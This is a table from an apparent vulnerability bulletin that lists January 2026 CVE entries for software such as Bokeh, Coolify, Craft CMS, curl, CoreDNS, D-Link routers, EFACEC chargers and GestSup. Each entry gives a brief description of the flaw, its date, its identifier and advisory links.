| bokeh--bokeh | Bokeh is an interactive visualization library written in Python. In versions 3.8.1 and below, if a server is configured with an allowlist (e.g., dashboard.corp), an attacker can register a domain like dashboard.corp.attacker.com (or use a subdomain if applicable) and lure a victim to visit it. The malicious site can then initiate a WebSocket connection to the vulnerable Bokeh server. Since the Origin header (e.g., http://dashboard.corp.attacker.com/) matches the allowlist according to the flawed logic, the connection is accepted. Once connected, the attacker can interact with the Bokeh server on behalf of the victim, potentially accessing sensitive data, or modifying visualizations. This issue is fixed in version 3.8.2. | 2026-01-08 | not yet calculated | CVE-2026-21883 | https://github.com/bokeh/bokeh/security/advisories/GHSA-793v-589g-574v https://github.com/bokeh/bokeh/commit/cedd113b0e271b439dce768671685cf5f861812e |
| BoldGrid--Post and Page Builder by BoldGrid | Missing Authorization vulnerability in BoldGrid Post and Page Builder by BoldGrid post-and-page-builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Post and Page Builder by BoldGrid: from n/a through <= 1.27.9. | 2026-01-06 | not yet calculated | CVE-2025-69345 | https://vdp.patchstack.com/database/Wordpress/Plugin/post-and-page-builder/vulnerability/wordpress-post-and-page-builder-by-boldgrid-plugin-1-27-9-broken-access-control-vulnerability?_s_id=cve |
| brandexponents--Oshine | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in brandexponents Oshine oshin allows PHP Local File Inclusion.This issue affects Oshine: from n/a through <= 7.2.7. | 2026-01-08 | not yet calculated | CVE-2025-14359 | https://vdp.patchstack.com/database/Wordpress/Theme/oshin/vulnerability/wordpress-oshine-theme-7-2-7-local-file-inclusion-vulnerability?_s_id=cve |
| BuddhaThemes--WeDesignTech Ultimate Booking Addon | Missing Authorization vulnerability in BuddhaThemes WeDesignTech Ultimate Booking Addon wedesigntech-ultimate-booking-addon allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WeDesignTech Ultimate Booking Addon: from n/a through <= 1.0.3. | 2026-01-06 | not yet calculated | CVE-2025-69341 | https://vdp.patchstack.com/database/Wordpress/Plugin/wedesigntech-ultimate-booking-addon/vulnerability/wordpress-wedesigntech-ultimate-booking-addon-plugin-1-0-3-broken-access-control-vulnerability?_s_id=cve |
| Campaign Monitor--Campaign Monitor for WordPress | Missing Authorization vulnerability in Campaign Monitor Campaign Monitor for WordPress forms-for-campaign-monitor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Campaign Monitor for WordPress: from n/a through <= 2.9.0. | 2026-01-08 | not yet calculated | CVE-2026-0674 | https://vdp.patchstack.com/database/Wordpress/Plugin/forms-for-campaign-monitor/vulnerability/wordpress-campaign-monitor-for-wordpress-plugin-2-9-0-broken-access-control-vulnerability?_s_id=cve |
| chlodigital--PRIMER by chlodigital | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in chloédigital PRIMER by chloédigital primer-by-chloedigital allows Reflected XSS.This issue affects PRIMER by chloédigital: from n/a through <= 1.0.25. | 2026-01-08 | not yet calculated | CVE-2025-68873 | https://vdp.patchstack.com/database/Wordpress/Plugin/primer-by-chloedigital/vulnerability/wordpress-primer-by-chloedigital-plugin-1-0-25-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Cloudways--Breeze | Missing Authorization vulnerability in Cloudways Breeze breeze allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Breeze: from n/a through <= 2.2.21. | 2026-01-06 | not yet calculated | CVE-2025-69364 | https://vdp.patchstack.com/database/Wordpress/Plugin/breeze/vulnerability/wordpress-breeze-plugin-2-2-21-broken-access-control-vulnerability?_s_id=cve |
| CMSJunkie - WordPress Business Directory Plugins--WP-BusinessDirectory | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CMSJunkie - WordPress Business Directory Plugins WP-BusinessDirectory wp-businessdirectory allows Reflected XSS.This issue affects WP-BusinessDirectory: from n/a through <= 3.1.5. | 2026-01-08 | not yet calculated | CVE-2025-68887 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-businessdirectory/vulnerability/wordpress-wp-businessdirectory-plugin-3-1-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| CodexThemes--TheGem Theme Elements (for Elementor) | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in CodexThemes TheGem Theme Elements (for Elementor) thegem-elements-elementor allows PHP Local File Inclusion.This issue affects TheGem Theme Elements (for Elementor): from n/a through <= 5.11.0. | 2026-01-06 | not yet calculated | CVE-2025-69356 | https://vdp.patchstack.com/database/Wordpress/Plugin/thegem-elements-elementor/vulnerability/wordpress-thegem-theme-elements-for-elementor-plugin-5-11-0-local-file-inclusion-vulnerability?_s_id=cve |
| CodexThemes--TheGem Theme Elements (for Elementor) | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodexThemes TheGem Theme Elements (for Elementor) thegem-elements-elementor allows Stored XSS.This issue affects TheGem Theme Elements (for Elementor): from n/a through <= 5.11.0. | 2026-01-06 | not yet calculated | CVE-2025-69357 | https://vdp.patchstack.com/database/Wordpress/Plugin/thegem-elements-elementor/vulnerability/wordpress-thegem-theme-elements-for-elementor-plugin-5-11-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| CodexThemes--TheGem Theme Elements (for WPBakery) | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodexThemes TheGem Theme Elements (for WPBakery) thegem-elements allows DOM-Based XSS.This issue affects TheGem Theme Elements (for WPBakery): from n/a through <= 5.11.0. | 2026-01-06 | not yet calculated | CVE-2025-69360 | https://vdp.patchstack.com/database/Wordpress/Plugin/thegem-elements/vulnerability/wordpress-thegem-theme-elements-for-wpbakery-plugin-5-11-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Commvault--WebConsole | The Report Builder component of the application stores user input directly in a web page and displays it to other users, which raised concerns about a possible Cross-Site Scripting (XSS) attack. Proper management of this functionality helps ensure a secure and seamless user experience. Although the user input is not validated in the report creation, these scripts are not executed when the report is run by end users. The script is executed when the report is modified through the report builder by a user with edit permissions. The Report Builder is part of the WebConsole. The WebConsole package is currently end of life, and is no longer maintained. We strongly recommend against installing or using it in any production environment. However, if you choose to install it, for example, to access functionality like the Report Builder, it must be deployed within a fully isolated network that has no access to sensitive data or internet connectivity. This is a critical security precaution, as the retired package may contain unpatched vulnerabilities and is no longer supported with updates or fixes. | 2026-01-07 | not yet calculated | CVE-2025-12776 | https://documentation.commvault.com/securityadvisories/CV_2025_06_3.html |
| contentstudio--Contentstudio | Unrestricted Upload of File with Dangerous Type vulnerability in contentstudio Contentstudio contentstudio allows Upload a Web Shell to a Web Server.This issue affects Contentstudio: from n/a through <= 1.3.7. | 2026-01-08 | not yet calculated | CVE-2025-67910 | https://vdp.patchstack.com/database/Wordpress/Plugin/contentstudio/vulnerability/wordpress-contentstudio-plugin-1-3-7-arbitrary-file-upload-vulnerability?_s_id=cve |
| CoolHappy--The Events Calendar Countdown Addon | Missing Authorization vulnerability in CoolHappy The Events Calendar Countdown Addon countdown-for-the-events-calendar allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects The Events Calendar Countdown Addon: from n/a through <= 1.4.15. | 2026-01-06 | not yet calculated | CVE-2025-69348 | https://vdp.patchstack.com/database/Wordpress/Plugin/countdown-for-the-events-calendar/vulnerability/wordpress-the-events-calendar-countdown-addon-plugin-1-4-15-broken-access-control-vulnerability?_s_id=cve |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.420.7, a Remote Code Execution (RCE)*vulnerability exists in Coolify's application deployment workflow. This flaw allows a low-privileged member to inject arbitrary Docker Compose directives during project creation or updates. By defining a malicious service that mounts the host filesystem, an attacker can achieve root-level command execution on the host OS, completely bypassing container isolation. Version 4.0.0-beta.420.7 contains a patch for the issue. | 2026-01-05 | not yet calculated | CVE-2025-59156 | https://github.com/coollabsio/coolify/security/advisories/GHSA-h5xw-7xvp-xrxr |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Coolify versions prior to and including v4.0.0-beta.420.6 are vulnerable to a stored cross-site scripting (XSS) attack in the project creation workflow. An authenticated user with low privileges (e.g., member role) can create a project with a maliciously crafted name containing embedded JavaScript. When an administrator later attempts to delete the project or its associated resource, the payload automatically executes in the admin's browser context. Version 4.0.0-beta.420.7 contains a patch for the issue. | 2026-01-05 | not yet calculated | CVE-2025-59158 | https://github.com/coollabsio/coolify/security/advisories/GHSA-h52r-jxv9-9vhf |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Coolify versions prior to and including v4.0.0-beta.420.8 have an information disclosure vulnerability in the `/api/v1/teams/{team_id}/members` and `/api/v1/teams/current/members` API endpoints allows authenticated team members to access a highly sensitive `email_change_code` from other users on the same team. This code is intended for a single-use email change verification and should be kept secret. Its exposure could enable a malicious actor to perform an unauthorized email address change on behalf of the victim. As of time of publication, no known patched versions exist. | 2026-01-05 | not yet calculated | CVE-2025-59955 | https://github.com/coollabsio/coolify/security/advisories/GHSA-927g-56xp-6427 |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. In Coolify versions up to and including v4.0.0-beta.434, a low privileged user (member) can invite a high privileged user. At first, the application will throw an error, but if the attacker clicks the invite button a second time, it actually works. This way, a low privileged user can invite themselves as an administrator to the Coolify instance. After the high privileged user is invited, the attacker can initiate a password reset and log in with the new admin. As of time of publication, it is unclear if a patch is available. | 2026-01-05 | not yet calculated | CVE-2025-64421 | https://github.com/coollabsio/coolify/security/advisories/GHSA-4p6r-m39m-9cm9 https://drive.google.com/file/d/1YZHFgiZv_k9p9909A63DAErsTsh8K1rc/view?usp=drive_link |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. In Coolify vstarting with version 4.0.0-beta.434, the /login endpoint advertises a rate limit of 5 requests but can be trivially bypassed by rotating the X-Forwarded-For header. This enables unlimited credential stuffing and brute-force attempts against user and admin accounts. As of time of publication, it is unclear if a patch is available. | 2026-01-05 | not yet calculated | CVE-2025-64422 | https://github.com/coollabsio/coolify/security/advisories/GHSA-688j-rm43-5r8x |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. In Coolify versions up to and including v4.0.0-beta.434, a low privileged user (member) can see and use invitation links sent to an administrator. When they use the link before the legitimate recipient does, they are able to log in as an administrator, meaning they have successfully escalated their privileges. As of time of publication, it is unclear if a patch is available. | 2026-01-05 | not yet calculated | CVE-2025-64423 | https://github.com/coollabsio/coolify/security/advisories/GHSA-4fqm-797g-7m6j |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. In Coolify versions up to and including v4.0.0-beta.434, a command injection vulnerability exists in the git source input fields of a resource, allowing a low privileged user (member) to execute system commands as root on the Coolify instance. As of time of publication, it is unclear if a patch is available. | 2026-01-05 | not yet calculated | CVE-2025-64424 | https://github.com/coollabsio/coolify/security/advisories/GHSA-qx24-jhwj-8w6x https://drive.google.com/file/d/1rk7AYxNDkJUwo8uWbzX62PpBxpDYeyrZ/view?usp=drive_link |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. In Coolify versions up to and including v4.0.0-beta.434, an attacker can initiate a password reset for a victim, and modify the host header of the request to a malicious value. The victim will receive a password reset email, with a link to the malicious host. If the victim clicks this link, their reset token is sent to the attacker's server, allowing the attacker to use it to change the victim's password and takeover their account. As of time of publication, it is unclear if a patch is available. | 2026-01-05 | not yet calculated | CVE-2025-64425 | https://github.com/coollabsio/coolify/security/advisories/GHSA-f737-2p93-g2cw https://drive.google.com/file/d/1I5sJHcpetJbKlwVS2usAD7qmgH37Y4rw/view?usp=drive_link |
| coredns--coredns | CoreDNS is a DNS server that chains plugins. Prior to version 1.14.0, multiple CoreDNS server implementations (gRPC, HTTPS, and HTTP/3) lack critical resource-limiting controls. An unauthenticated remote attacker can exhaust memory and degrade or crash the server by opening many concurrent connections, streams, or sending oversized request bodies. The issue is similar in nature to CVE-2025-47950 (QUIC DoS) but affects additional server types that do not enforce connection limits, stream limits, or message size constraints. Version 1.14.0 contains a patch. | 2026-01-08 | not yet calculated | CVE-2025-68151 | https://github.com/coredns/coredns/security/advisories/GHSA-527x-5wrf-22m2 https://github.com/coredns/coredns/pull/7490 https://github.com/coredns/coredns/commit/0d8cbb1a6bcb6bc9c1a489865278b8725fa20812 |
| craftcms--cms | Craft is a platform for creating digital experiences. In versions 5.0.0-RC1 through 5.8.20 and 4.0.0-RC1 through 4.16.16, authenticated users on a Craft installation could potentially expose sensitive assets via their user profile photo via maliciously crafted requests. Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue. | 2026-01-05 | not yet calculated | CVE-2025-68436 | https://github.com/craftcms/cms/security/advisories/GHSA-53vf-c43h-j2x9 https://github.com/craftcms/cms/commit/4bcb0db554e273b66ce3b75263a13414c2368fc9 |
| craftcms--cms | Craft is a platform for creating digital experiences. In versions 5.0.0-RC1 through 5.8.20 and 4.0.0-RC1 through 4.16.16, the Craft CMS GraphQL `save_<VolumeName>_Asset` mutation is vulnerable to Server-Side Request Forgery (SSRF). This vulnerability arises because the `_file` input, specifically its `url` parameter, allows the server to fetch content from arbitrary remote locations without proper validation. Attackers can exploit this by providing internal IP addresses or cloud metadata endpoints as the `url`, forcing the server to make requests to these restricted services. The fetched content is then saved as an asset, which can subsequently be accessed and exfiltrated, leading to potential data exposure and infrastructure compromise. This exploitation requires specific GraphQL permissions for asset management within the targeted volume. Users should update to the patched 5.8.21 and 4.16.17 releases to mitigate the issue. | 2026-01-05 | not yet calculated | CVE-2025-68437 | https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc https://github.com/craftcms/cms/commit/013db636fdb38f3ce5657fd196b6d952f98ebc52 https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04 |
| craftcms--cms | Craft is a platform for creating digital experiences. Versions 5.0.0-RC1 through 5.8.20 and 4.0.0-RC1 through 4.16.16 are vulnerable to potential authenticated Remote Code Execution via Twig SSTI. For this to work, users must have administrator access to the Craft Control Panel, and allowAdminChanges must be enabled, which is against Craft CMS' recommendations for any non-dev environment. Alternatively, a non-administrator account with allowAdminChanges disabled can be used, provided access to the System Messages utility is available. It is possible to craft a malicious payload using the Twig `map` filter in text fields that accept Twig input under Settings in the Craft control panel or using the System Messages utility, which could lead to a RCE. Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue. | 2026-01-05 | not yet calculated | CVE-2025-68454 | https://github.com/craftcms/cms/security/advisories/GHSA-742x-x762-7383 https://github.com/craftcms/cms/commit/d82680f4a05f9576883bb83c3f6243d33ca73ebe https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04 |
| craftcms--cms | Craft is a platform for creating digital experiences. Versions 5.0.0-RC1 through 5.8.20 and 4.0.0-RC1 through 4.16.16 are vulnerable to potential authenticated Remote Code Execution via malicious attached Behavior. Note that attackers must have administrator access to the Craft Control Panel for this to work. Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue. | 2026-01-05 | not yet calculated | CVE-2025-68455 | https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5 https://github.com/craftcms/cms/commit/27f55886098b56c00ddc53b69239c9c9192252c7 https://github.com/craftcms/cms/commit/6e608a1a5bfb36943f94f584b7548ca542a86fef https://github.com/craftcms/cms/commit/ec43c497edde0b2bf2e39a119cded2e55f9fe593 https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04 |
| craftcms--cms | Craft is a platform for creating digital experiences. In versions 5.0.0-RC1 through 5.8.20 and 3.0.0 through 4.16.16, unauthenticated users can trigger database backup operations via specific admin actions, potentially leading to resource exhaustion or information disclosure. Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue. Craft 3 users should update to the latest Craft 4 and 5 releases, which include the fixes. | 2026-01-05 | not yet calculated | CVE-2025-68456 | https://github.com/craftcms/cms/security/advisories/GHSA-v64r-7wg9-23pr https://github.com/craftcms/cms/commit/f83d4e0c6b906743206b4747db4abf8164b8da39 https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04 |
| curl--curl | When using `CURLOPT_PINNEDPUBLICKEY` option with libcurl or `--pinnedpubkey` with the curl tool,curl should check the public key of the server certificate to verify the peer. This check was skipped in a certain condition that would then make curl allow the connection without performing the proper check, thus not noticing a possible impostor. To skip this check, the connection had to be done with QUIC with ngtcp2 built to use GnuTLS and the user had to explicitly disable the standard certificate verification. | 2026-01-08 | not yet calculated | CVE-2025-13034 | json www |
| curl--curl | When doing multi-threaded LDAPS transfers (LDAP over TLS) with libcurl, changing TLS options in one thread would inadvertently change them globally and therefore possibly also affect other concurrently setup transfers. Disabling certificate verification for a specific transfer could unintentionally disable the feature for other threads as well. | 2026-01-08 | not yet calculated | CVE-2025-14017 | json www |
| curl--curl | When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer performs a cross-protocol redirect to a second URL that uses an IMAP, LDAP, POP3 or SMTP scheme, curl might wrongly pass on the bearer token to the new target host. | 2026-01-08 | not yet calculated | CVE-2025-14524 | json www issue |
| curl--curl | When doing TLS related transfers with reused easy or multi handles and altering the `CURLSSLOPT_NO_PARTIALCHAIN` option, libcurl could accidentally reuse a CA store cached in memory for which the partial chain option was reversed. Contrary to the user's wishes and expectations. This could make libcurl find and accept a trust chain that it otherwise would not. | 2026-01-08 | not yet calculated | CVE-2025-14819 | json www |
| curl--curl | When doing SSH-based transfers using either SCP or SFTP, and setting the known_hosts file, libcurl could still mistakenly accept connecting to hosts *not present* in the specified file if they were added as recognized in the libssh *global* known_hosts file. | 2026-01-08 | not yet calculated | CVE-2025-15079 | json www issue |
| curl--curl | When doing SSH-based transfers using either SCP or SFTP, and asked to do public key authentication, curl would wrongly still ask and authenticate using a locally running SSH agent. | 2026-01-08 | not yet calculated | CVE-2025-15224 | json www issue |
| CyberChimps--Responsive Addons for Elementor | Missing Authorization vulnerability in CyberChimps Responsive Addons for Elementor responsive-addons-for-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Responsive Addons for Elementor: from n/a through <= 2.0.8. | 2026-01-06 | not yet calculated | CVE-2025-69363 | https://vdp.patchstack.com/database/Wordpress/Plugin/responsive-addons-for-elementor/vulnerability/wordpress-responsive-addons-for-elementor-plugin-2-0-8-broken-access-control-vulnerability?_s_id=cve |
| D-Link--DSL-2640B | Multiple D-Link DSL/DIR/DNS devices contain an authentication bypass and improper access control vulnerability in the dnscfg.cgi endpoint that allows an unauthenticated attacker to access DNS configuration functionality. By directly requesting this endpoint, an attacker can modify the device's DNS settings without valid credentials, enabling DNS hijacking ("DNSChanger") attacks that redirect user traffic to attacker-controlled infrastructure. In 2019, D-Link reported that this behavior was leveraged by the "GhostDNS" malware ecosystem targeting consumer and carrier routers. All impacted products were subsequently designated end-of-life/end-of-service, and no longer receive security updates. Exploitation evidence was observed by the Shadowserver Foundation on 2025-11-27 (UTC). | 2026-01-05 | not yet calculated | CVE-2026-0625 | https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10488 https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10068 https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10118 https://www.vulncheck.com/advisories/dlink-dsl-command-injection-via-dns-configuration-endpoint |
| Data Illusion Zumbrunn--NGSurvey | Stored cross-site scripting (XSS, CWE-79) in the survey content and administration functionality in Data Illusion Zumbrunn NGSurvey Enterprise Edition 3.6.4 on all supported platforms ( on Windows and Linux servers ) allows authenticated remote users with survey creation or edit privileges to execute arbitrary JavaScript in other users' browsers, steal session information and perform unauthorized actions on their behalf via crafted survey content that is rendered without proper output encoding. | 2026-01-07 | not yet calculated | CVE-2025-15479 | https://docs.ngsurvey.com/installation-setup/change-log#id-3.6.17-2025-05-28 https://cds.thalesgroup.com/en/tcs-cert/CVE-2025-15479 |
| Devolutions--PowerShell Universal | Cross-site Scripting vulnerability in Devolutions PowerShell Universal.This issue affects Powershell Universal: before 4.5.6, before 5.6.13. | 2026-01-07 | not yet calculated | CVE-2026-0618 | https://devolutions.net/security/advisories/DEVO-2026-0001/ |
| Devolutions--Remote Desktop Manager | Exposure of sensitive information in the TeamViewer entry dashboard component in Devolutions Remote Desktop Manager 2025.3.24.0 through 2025.3.28.0 on Windows allows an external observer to view a password on screen via a defective masking feature, for example during physical observation or screen sharing. | 2026-01-08 | not yet calculated | CVE-2026-0747 | https://devolutions.net/security/advisories/DEVO-2026-0002/ |
| e-plugins--ListingHub | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in e-plugins ListingHub listinghub allows Reflected XSS.This issue affects ListingHub: from n/a through 1.2.6. | 2026-01-08 | not yet calculated | CVE-2025-12551 | https://vdp.patchstack.com/database/Wordpress/Plugin/listinghub/vulnerability/wordpress-listinghub-plugin-1-2-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| e-plugins--Real Estate Pro | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in e-plugins Real Estate Pro real-estate-pro allows Reflected XSS.This issue affects Real Estate Pro: from n/a through <= 2.1.4. | 2026-01-08 | not yet calculated | CVE-2025-13504 | https://vdp.patchstack.com/database/Wordpress/Plugin/real-estate-pro/vulnerability/wordpress-real-estate-pro-plugin-2-1-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| EFACEC--QC 60/90/120 | An attacker with the ability to interact through the network and with access credentials, could, thanks to the unsecured (unencrypted) MQTT communications protocol, write on the server topics of the board that controls the MQTT communications | 2026-01-07 | not yet calculated | CVE-2026-22535 | https://cds.thalesgroup.com/en |
| EFACEC--QC 60/90/120 | The absence of permissions control for the user XXX allows the current configuration in the sudoers file to escalate privileges without any restrictions | 2026-01-07 | not yet calculated | CVE-2026-22536 | https://cds.thalesgroup.com/en |
| EFACEC--QC 60/90/120 | The lack of hardening of the system allows the user used to manage and maintain the charger to consult different files containing clear-text credentials or valuable information for an attacker. | 2026-01-07 | not yet calculated | CVE-2026-22537 | https://cds.thalesgroup.com/en |
| EFACEC--QC 60/90/120 | As the service interaction is performed without authentication, an attacker with some knowledge of the protocol could obtain information about the charger via OCPP v1.6. | 2026-01-07 | not yet calculated | CVE-2026-22539 | https://cds.thalesgroup.com/en |
| EFACEC--QC 60/90/120 | The massive sending of ICMP requests causes a denial of service on one of the boards from the EVCharger that allows control the EV interfaces. Since the board must be operating correctly for the charger to also function correctly. | 2026-01-07 | not yet calculated | CVE-2026-22541 | https://cds.thalesgroup.com/en |
| EFACEC--QC 60/90/120 | An attacker with access to the system's internal network can cause a denial of service on the system by making two concurrent connections through the Telnet service. | 2026-01-07 | not yet calculated | CVE-2026-22542 | https://cds.thalesgroup.com/en |
| EFACEC--QC 60/90/120 | The credentials required to access the device's web server are sent in base64 within the HTTP headers. Since base64 is not considered a strong cipher, an attacker could intercept the web request handling the login and obtain the credentials | 2026-01-07 | not yet calculated | CVE-2026-22543 | https://cds.thalesgroup.com/en |
| EFACEC--QC 60/90/120 | An attacker with a network connection could detect credentials in clear text. | 2026-01-07 | not yet calculated | CVE-2026-22544 | https://cds.thalesgroup.com/en |
| EFACEC--QC60/90/120 | The massive sending of ARP requests causes a denial of service on one board of the charger that allows control of the EV interfaces. Since the board must be operating correctly for the charger to also function correctly. | 2026-01-07 | not yet calculated | CVE-2026-22540 | https://cds.thalesgroup.com/en |
| Elated-Themes--Neo Ocular | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Elated-Themes Neo Ocular neoocular allows PHP Local File Inclusion.This issue affects Neo Ocular: from n/a through < 1.2. | 2026-01-08 | not yet calculated | CVE-2025-67920 | https://vdp.patchstack.com/database/Wordpress/Theme/neoocular/vulnerability/wordpress-neo-ocular-theme-1-2-local-file-inclusion-vulnerability?_s_id=cve |
| Fahad Mahmood--RSS Feed Widget | Missing Authorization vulnerability in Fahad Mahmood RSS Feed Widget rss-feed-widget allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects RSS Feed Widget: from n/a through <= 3.0.2. | 2026-01-06 | not yet calculated | CVE-2025-69349 | https://vdp.patchstack.com/database/Wordpress/Plugin/rss-feed-widget/vulnerability/wordpress-rss-feed-widget-plugin-3-0-2-broken-access-control-vulnerability?_s_id=cve |
| Forcepoint--Forcepoint One Endpoint (F1E) | Forcepoint One DLP Client, version 23.04.5642 (and possibly newer versions), includes a restricted version of Python 2.5.4 that prevents use of the ctypes library. ctypes is a foreign function interface (FFI) for Python, enabling calls to DLLs/shared libraries, memory allocation, and direct code execution. It was demonstrated that these restrictions could be bypassed. | 2026-01-06 | not yet calculated | CVE-2025-14026 | https://support.forcepoint.com/s/article/000042256 https://kb.cert.org/vuls/id/420440 |
| Fujitsu Client Computing Limited--Fujitsu Security Solution AuthConductor Client Basic V2 | Origin validation error issue exists in Fujitsu Security Solution AuthConductor Client Basic V2 2.0.25.0 and earlier. If this vulnerability is exploited, an attacker who can log in to the Windows system where the affected product is installed may execute arbitrary code with SYSTEM privilege and/or modify the registry value. | 2026-01-07 | not yet calculated | CVE-2026-20893 | https://www.fmworld.net/biz/common/info/202601acc/ https://jvn.jp/en/jp/JVN24626628/ |
| G5Theme--Zorka | Missing Authorization vulnerability in G5Theme Zorka zorka allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Zorka: from n/a through <= 1.5.7. | 2026-01-08 | not yet calculated | CVE-2026-0676 | https://vdp.patchstack.com/database/Wordpress/Theme/zorka/vulnerability/wordpress-zorka-theme-1-5-7-broken-access-control-vulnerability?_s_id=cve |
| GestSup--GestSup | GestSup versions up to and including 3.2.56 contain a cross-site request forgery (CSRF) vulnerability where the application does not verify the authenticity of client requests. An attacker can induce a logged-in user to submit crafted requests that perform actions with the victim's privileges. This can be exploited to create privileged accounts by targeting the administrative user creation endpoint. | 2026-01-09 | not yet calculated | CVE-2026-22194 | https://gestsup.fr/index.php?page=changelog https://www.vulncheck.com/advisories/gestsup-csrf-allows-privileged-actions |
| GestSup--GestSup | GestSup versions up to and including 3.2.56 contain a SQL injection vulnerability in the search bar functionality. User-controlled search input is incorporated into SQL queries without sufficient neutralization, allowing an authenticated attacker to manipulate database queries. Successful exploitation can result in unauthorized access to or modification of database contents depending on database privileges. | 2026-01-09 | not yet calculated | CVE-2026-22195 | https://gestsup.fr/index.php?page=changelog https://www.vulncheck.com/advisories/gestsup-sqli-in-search-bar |
| GestSup--GestSup | GestSup versions up to and including 3.2.56 contain a SQL injection vulnerability in ticket creation functionality. User-controlled input provided during ticket creation is incorporated into SQL queries without sufficient neutralization, allowing an authenticated attacker to manipulate database queries. Successful exploitation can result in unauthorized access to or modification of database contents depending on database privileges. | 2026-01-09 | not yet calculated | CVE-2026-22196 | https://gestsup.fr/index.php?page=changelog https://www.vulncheck.com/advisories/gestsup-sqli-in-ticket-creation |
| GestSup--GestSup | GestSup versions up to and including 3.2.56 contain multiple SQL injection vulnerabilities in the asset list functionality. Multiple request parameters used to filter, search, or sort assets are incorporated into SQL queries without sufficient neutralization, allowing an authenticated attacker to manipulate database queries. Successful exploitation can result in unauthorized access to or modification of database contents depending on database privileges. | 2026-01-09 | not yet calculated | CVE-2026-22197 | https://gestsup.fr/index.php?page=changelog https://www.vulncheck.com/advisories/gestsup-multiple-sqli-in-asset-list |
| GestSup--GestSup | GestSup versions up to and including 3.2.56 contain a pre-authentication stored cross-site scripting (XSS) vulnerability in the API error logging functionality. By sending an API request with a crafted X-API-KEY header value (for example, to /api/v1/ticket.php), an unauthenticated attacker can cause attacker-controlled HTML/JavaScript to be written to log entries. When an administrator later views the affected logs in the web interface, the injected content is rendered without proper output encoding, resulting in arbitrary script execution in the administrator's browser session. | 2026-01-09 | not yet calculated | CVE-2026-22198 | https://gestsup.fr/index.php?page=changelog https://www.vulncheck.com/advisories/gestsup-stored-xss-in-api-error-logs |
| getkirby--kirby | Kirby is an open-source content management system. From versions 5.0.0 to 5.2.1, Kirby is missing permission checks in the content changes API. This vulnerability affects all Kirby sites where user permissions are configured to prevent specific role(s) from performing write actions, specifically by disabling the update permission with the intent to prevent modifications to site content. This vulnerability does not affect those who have not altered the deviated from default user permissions. This issue has been patched in version 5.2.2. | 2026-01-08 | not yet calculated | CVE-2026-21896 | https://github.com/getkirby/kirby/security/advisories/GHSA-4j78-4xrm-cr2f https://github.com/getkirby/kirby/commit/f5ce1347b427b819bf193acf11fd0da232f7af47 https://github.com/getkirby/kirby/releases/tag/5.2.2 |
| GitHub--Enterprise Server | An Improper Neutralization of Input During Web Page Generation vulnerability was identified in GitHub Enterprise Server that allowed attacker controlled HTML to be rendered by the Filter component (search) across GitHub that could be used to exfiltrate sensitive information. An attacker would require permissions to create or modify the names of milestones, issues, pull requests, or similar entities that are rendered in the vulnerable filter/search components. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.20 and was fixed in versions 3.19.1, and 3.18.2, 3.17.8, 3.16.11, 3.15.15, and 3.14.20. This vulnerability was reported via the GitHub Bug Bounty program. | 2026-01-06 | not yet calculated | CVE-2025-13744 | https://docs.github.com/en/enterprise-server@3.14/admin/release-notes#3.14.20 https://docs.github.com/en/enterprise-server@3.15/admin/release-notes#3.15.15 https://docs.github.com/en/enterprise-server@3.16/admin/release-notes#3.16.11 https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.8 https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.2 https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.1 |
